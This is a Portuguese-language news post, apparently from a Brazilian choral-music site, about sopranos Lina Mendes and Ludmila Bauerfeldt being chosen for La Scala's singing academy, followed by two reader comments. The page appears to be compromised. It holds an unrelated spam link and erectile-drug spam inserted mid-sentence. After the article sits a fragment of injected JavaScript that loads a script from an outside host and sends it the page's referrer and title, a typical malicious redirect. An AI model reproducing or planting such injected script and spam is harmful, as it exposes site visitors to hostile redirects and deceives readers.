Notícia

Lina Mendes e Ludmila Bauerfeldt no Scala de Milão

http://Fine-wood-working.com/

p>O soprano Lina Mendes e Ludmila Bauerfeldt acabam de ser escolhidas pela Scala de Milão para o curso de aperfeiçoamento na academia de canto daquele teatro.

Depois de audições feitas no mundo todo, do Japão aos USA , entre mais de quase duzentos candidatos poucos chegaram à Scala após rigorosos julgamentos e, na final realizada em 14 de julho, Lina e Ludmila acabaram entre os 4 postulantes escolhidos.

Para os que não a conhecem bem, um breve resumo: Lina cantou Eurídice, de Gluck, no Teatro São Pedro, em SP, em 2010.Vista pelo Maestro Jamil Maluf, foi escolhida como soprano protagonista de I Pagliacci, que cantou em SP também em 2010, sob aplausos gerais de público e de crític

a. Escolhida para cantar várias outras obras em SP, acabou recebendo a láurea máxima que é ser soprano protagonista na primeira récita com venda de ingressos na comemoração dos cem anos do Teatro Municipal de São Paulo: Lina será a Gilda do “Rigoletto” de 14 de setembro.

Lina Mendes e Ludmila Bauerfeldt são importantes valores da over the counter male erection novíssima geração de cantores líricos brasileiros, por suas efetivas realizações e por seus brilhantíssimos talentos. A Scala de Milão o confirma.

Já deu frutos a parceria firmada entre o Theatro Municipal e a Academia do Alla Scala de Milão, com a colaboração do Instituto Italiano de Cultura do Rio de Janeiro e da Embaixada da Itália no Brasil.

}s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

2 Comments

  1. Parabéns pelo trabalho talentoso e de mérito!
    Vamos conferir seu talento Lina, nas récitas do “Rigoletto”, em São Paulo.

  2. Gostaria de destacar ainda o brilhantismo de Ludmilla Bauerfeldt na conquista de dois primeiros lugares nos maiores concursos de canto lírico do país. O primeiro, Vozes do Brasil, realizado em 2010 pelo Theatro Municipal do Rio de Janeiro, no qual ela recebeu o primeiro lugar e o prêmio de Júri Popular; e o segundo, Concurso Internacional de Canto Bidu Sayão, realizado em Belo Horizonte, em 2011, no qual ela conquistou o primeiro lugar feminino. Parabéns, para as duas e que esse seja o início de uma gloriosa carreira internacional…

Comments are closed.

Antônio Rodrigues
Apaixonado por música coral, é um dos fundadores e mantenedor do movimento.com.